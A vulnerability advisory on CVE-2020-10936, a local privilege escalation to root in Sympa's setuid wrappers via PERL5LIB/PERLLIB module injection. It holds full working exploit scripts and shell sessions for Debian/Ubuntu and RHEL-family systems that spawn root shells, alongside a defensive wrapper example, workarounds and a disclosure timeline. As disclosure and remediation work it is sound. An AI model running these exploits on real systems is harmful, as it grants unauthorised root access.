[CVE-2020-10936] SYMPA privilege escalation to root
We found a way to escalate our privileges to root by exploiting a flaw in Sympa's setuid wrappers: they forward the caller's environment unchanged, which lets an unprivileged user make the Perl interpreter load malicious libraries.
Description
Sympa is an electronic mailing list manager.
It is used to automate list management functions such as subscription, moderation and archive management. Sympa also handles the delivery of messages to the lists and makes it possible to reduce the load on the system. Provided that you have enough memory on your system, Sympa is especially well suited to big lists.
Threat
Privilege escalation to root
Vulnerability records
CVE ID: CVE-2020-10936
Access Vector: local
Security Risk: high
Vulnerability: CWE-269
CVSS Base Score: 8.8
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Details
When Sympa is installed on CentOS/Fedora/RHEL, several binaries carry the setuid/setgid bit:
[sysdream@localhost ~]$ ls -lah /usr/libexec/sympa/
[...]
-rwsr-xr-x. 1 sympa sympa 16K 23 janv. 09:46 bouncequeue
-rwsr-xr-x. 1 sympa sympa 16K 23 janv. 09:46 familyqueue
-rwsr-xr-x. 1 sympa sympa 16K 23 janv. 09:46 queue
-rwsr-x---. 1 root sympa 16K 23 janv. 09:46 sympa_newaliases-wrapper
-rwsr-sr-x. 1 sympa sympa 16K 23 janv. 09:46 sympa_soap_server-wrapper.fcgi
-rwsr-sr-x. 1 sympa sympa 16K 23 janv. 09:46 wwsympa-wrapper.fcgi
As you can see, only the sympa_newaliases-wrapper binary is setuid root.
However, this binary is not world-executable: only members of the sympa group may run it, and our user is not one of them.
So, in order to execute this program, we first need to escalate our privileges to the sympa user.
If we look at the source code of wwsympa-wrapper.fcgi, which is setuid/setgid sympa, we can see that its main function executes the WWSYMPA binary (wwsympa.fcgi) as the sympa user and group:
#include <unistd.h>
int main(int argn, char **argv, char **envp) {
setreuid(geteuid(),geteuid()); // Added to fix the segfault
setregid(getegid(),getegid()); // Added to fix the segfault
argv[0] = WWSYMPA;
return execve(WWSYMPA,argv,envp);
}
The vulnerability is caused by the envp variable, which is passed through unchanged to the WWSYMPA binary.
It means that every environment variable defined when running wwsympa-wrapper.fcgi is inherited by wwsympa.fcgi.
As wwsympa.fcgi is interpreted as a Perl script, the interpreter consults the PERLLIB and PERL5LIB environment variables when searching for Perl modules, and the directories they list are searched before the system directories in @INC.
Perl would normally ignore these variables when it detects that it is running with differing real and effective user or group IDs (taint mode is enabled automatically in that case), but the setreuid()/setregid() calls in the wrapper make the real and effective IDs equal before execve(), so that built-in protection never triggers.
So, if we create a malicious Perl module in a directory listed in PERLLIB or PERL5LIB and its name matches a module the script loads, the interpreter will load our code.
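The root cause is that the wrapper hands its own envp to execve(). The following wrapper is an added example, written for this advisory and not Sympa's code or its patch, showing the safe pattern: build a fresh environment from an allowlist (PATH fixed, a few locale variables copied through) and never forward anything else, so PERL5LIB, PERLLIB, PERL5OPT, LD_PRELOAD and any variable one might forget to blocklist are dropped by construction. The target path and the allowlist are assumptions.

```c
/* Added example (not Sympa's code or its patch): a setuid wrapper that refuses
 * to forward the caller's environment to the Perl script it executes.
 * Assumptions: the target path below and the allowlist of variable names. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef WWSYMPA
#define WWSYMPA "/usr/libexec/sympa/wwsympa.fcgi"   /* assumed target path */
#endif

/* The only caller-supplied variables that are copied through. Everything else
 * (PERL5LIB, PERLLIB, PERL5OPT, PERL5DB, LD_PRELOAD, LD_LIBRARY_PATH, ...) is
 * dropped because it was never allowlisted, so there is no blocklist to bypass. */
static const char *const allowed_names[] = { "LANG", "LC_ALL", "TZ", NULL };

/* PATH is not taken from the caller either: a fixed value is used instead. */
static char fixed_path[] = "PATH=/usr/bin:/bin";

/* Returns 1 if entry is "NAME=value" with NAME in allowed_names, else 0. */
static int env_is_allowed(const char *entry)
{
    const char *eq = strchr(entry, '=');
    if (eq == NULL)
        return 0;                          /* malformed entry without '=' */
    size_t name_len = (size_t)(eq - entry);
    for (size_t i = 0; allowed_names[i] != NULL; i++) {
        if (strlen(allowed_names[i]) == name_len &&
            strncmp(entry, allowed_names[i], name_len) == 0)
            return 1;
    }
    return 0;
}

/* Builds a NULL-terminated environment in out[] from in[]: the fixed PATH
 * first, then the allowlisted entries in their original order. Returns the
 * number of entries written (excluding the terminating NULL), or -1 if
 * out_cap is too small to hold them plus the NULL. */
int build_safe_env(char **in, char **out, size_t out_cap)
{
    size_t kept = 0;
    if (out_cap < 2)
        return -1;
    out[kept++] = fixed_path;
    for (size_t i = 0; in[i] != NULL; i++) {
        if (!env_is_allowed(in[i]))
            continue;
        if (kept + 1 >= out_cap)           /* keep room for the terminating NULL */
            return -1;
        out[kept++] = in[i];
    }
    out[kept] = NULL;
    return (int)kept;
}

int main(int argc, char **argv, char **envp)
{
    char *safe_env[64];
    (void)argc;

    if (build_safe_env(envp, safe_env, sizeof safe_env / sizeof safe_env[0]) < 0) {
        fputs("wrapper: environment too large\n", stderr);
        return 1;
    }
    /* Same uid/gid handling as the original wrapper, with return values checked. */
    if (setreuid(geteuid(), geteuid()) != 0 || setregid(getegid(), getegid()) != 0) {
        perror("wrapper: setreuid/setregid");
        return 1;
    }
    argv[0] = WWSYMPA;
    execve(WWSYMPA, argv, safe_env);       /* safe_env, never the caller's envp */
    perror("wrapper: execve");             /* only reached if execve fails */
    return 1;
}
```

An allowlist is preferred over stripping PERL5LIB and PERLLIB by name because Perl honours several other variables (PERL5OPT, PERL5DB, PERLIO) and the dynamic loader honours LD_PRELOAD and LD_LIBRARY_PATH; a blocklist that misses any one of them leaves the same hole open.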
We came up with the following PoC, which escalates our privileges to sympa by creating a malicious Config Perl module (Config is a core module, so it is loaded early, and our PERL5LIB directory is searched before the system one):
$ id
uid=1000(sysdream) gid=1000(sysdream) groupes=1000(sysdream),10(wheel) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
$ mkdir /tmp/poc
$ echo 'exec("/bin/bash");' > /tmp/poc/Config.pm
$ PERL5LIB=/tmp/poc PERLLIB=/tmp/poc /usr/libexec/sympa/wwsympa-wrapper.fcgi
bash-5.0$ id
uid=977(sympa) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Now that we are the sympa user, we are allowed to execute the sympa_newaliases-wrapper setuid-root binary. Let's take a look at its source code:
#include <unistd.h>
int main(int argn, char **argv, char **envp) {
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
argv[0] = SYMPA_NEWALIASES;
return execve(SYMPA_NEWALIASES, argv, envp);
}
SYMPA_NEWALIASES points to sympa_newaliases.pl, which is also a Perl script!
Reusing the same PoC, we can escalate our privileges to root:
bash-5.0$ id
uid=977(sympa) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-5.0$ echo $PERLLIB
/tmp/poc
bash-5.0$ echo $PERL5LIB
/tmp/poc
bash-5.0$ /usr/libexec/sympa/sympa_newaliases-wrapper
[root@localhost poc]# id
uid=0(root) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost poc]# whoami
root
On Debian/Ubuntu systems, /usr/lib/sympa/bin/sympa_newaliases-wrapper is already setuid root and world-executable, which means that we do not need to escalate to sympa first in order to gain root privileges:
user@debian:~$ ls -lah /usr/lib/sympa/bin/sympa_newaliases-wrapper
-rwsr-xr-x 1 root root 14K janv. 20 2019 /usr/lib/sympa/bin/sympa_newaliases-wrapper
user@debian:~$ mkdir /tmp/poc && echo 'exec("/bin/sh")' >> /tmp/poc/Config.pm
user@debian:~$ PERL5LIB=/tmp/poc PERLLIB=/tmp/poc /usr/lib/sympa/bin/sympa_newaliases-wrapper
# whoami
root
#
Proof of Concept: Root privilege escalation – Debian / Ubuntu
Standard user to root privileges:
#!/bin/sh
echo "[+] SYMPA on Debian/Ubuntu root privilege escalation exploit - n.chatelain -at- sysdream.com"
echo "[~] Exploit setup."
EXPLOITDIR=$(mktemp -d)
EXPLOITFILE="$EXPLOITDIR/Config.pm"
chmod 777 $EXPLOITDIR
echo 'exec("/bin/sh");' > $EXPLOITFILE
export PERLLIB=$EXPLOITDIR
export PERL5LIB=$EXPLOITDIR
echo "[+] Triggering exploit."
/usr/lib/sympa/bin/sympa_newaliases-wrapper
Output:
user@debian:~$ bash poc.sh
[+] SYMPA on Debian/Ubuntu root privilege escalation exploit - n.chatelain -at- sysdream.com
[~] Exploit setup.
[+] Triggering exploit.
# whoami
root
Proof of Concept: Root privilege escalation – Fedora / CentOS / RedHat
Standard user to sympa to root privilege escalation:
#!/bin/sh
echo "[+] SYMPA on Fedora/CentOS/RHEL root privilege escalation exploit - n.chatelain -at- sysdream.com"
echo "[~] Exploit setup."
EXPLOITDIR=$(mktemp -d)
EXPLOITFILE="$EXPLOITDIR/Config.pm"
chmod 777 $EXPLOITDIR
cat > $EXPLOITFILE <<"EOL"
my $sympauser = "sympa";
my $pwuid = getpwuid( $< );
$elevate = $pwuid eq $sympauser;
$root = $pwuid eq "root";
if ($elevate == 1)
{
print "[+] Running as service user, elevating privileges as root...\n";
exec("/usr/libexec/sympa/sympa_newaliases-wrapper");
}
else {
if ($root == 1)
{
print "[+] Running as root, popping shell.\n";
exec("/bin/sh");
}
else
{
print "[!] Not running as root/sympa, exploit failed.\n";
}
}
EOL
export PERLLIB=$EXPLOITDIR
export PERL5LIB=$EXPLOITDIR
echo "[+] Triggering exploit."
/usr/libexec/sympa/wwsympa-wrapper.fcgi
Output:
[user@localhost exploit]$ bash poc.sh
[+] SYMPA on Fedora/CentOS/RHEL root privilege escalation exploit - n.chatelain -at- sysdream.com
[~] Exploit setup.
[+] Triggering exploit.
[+] Running as service user, elevating privileges as root...
[+] Running as root, popping shell.
sh-5.0# whoami
root
Affected versions
- Sympa 6.2.54
Workarounds
Sympa suggests the following workarounds:
- Stop using the FastCGI wrappers and remove them:
  - Modify the configuration of the HTTP server so that it does not use the wrapper. For detailed instructions see "Configure HTTP server: Instruction by HTTP servers":
    https://sympa-community.github.io/manual/install/configure-http-server.html#instruction-by-http-servers
  - Remove the executable files of the FastCGI wrappers:
    - $EXECCGIDIR/wwsympa-wrapper.fcgi
    - $EXECCGIDIR/sympa_soap_server-wrapper.fcgi
- No workaround is known for some obsolete systems that require the FastCGI wrapper, in particular Apache HTTP Server 2.2.x and earlier.
Solution
Sympa suggests to:
- Upgrade to version 6.2.56:
  - Source distribution: sympa-6.2.56.tar.gz
  - Binary distributions: check the release information published by your distributor.
- Or, if you installed Sympa from an earlier source distribution, apply a patch to the source, recompile the wrappers and reinstall them:
  - Patch for sympa-6.2 or later: sympa-6.2.54-sa-2020-002.patch
Timeline
- 2020-03-12 Initial discovery
- 2020-03-24 Contacted the developers
- 2020-03-24 Acknowledgment from the Sympa security team
- 2020-04-03 Feedback with a proposed patch, but not to be applied to all setuid binaries.
- 2020-04-16 We confirm that the patch seems effective, but it would be better to apply it to all binaries.
- 2020-04-24 Response: setuid-sympa wrappers are deprecated, so they should not be used in the first place.
- 2020-05-04 Follow-up e-mail asking about a release date for the patch and stating that our disclosure target is 2020-05-13.
- 2020-05-18 No reply, last follow-up.
- 2020-05-21 Reply with a draft advisory.
- 2020-05-25 Disclosure with the provided solutions and workarounds.
Credits to the Sympa team for the quick and effective handling of our report.
In particular, thanks to Soji Ikeda for his work and for developing the patch.
Credits
- Nicolas Chatelain, Sysdream (n.chatelain -at- sysdream -dot- com)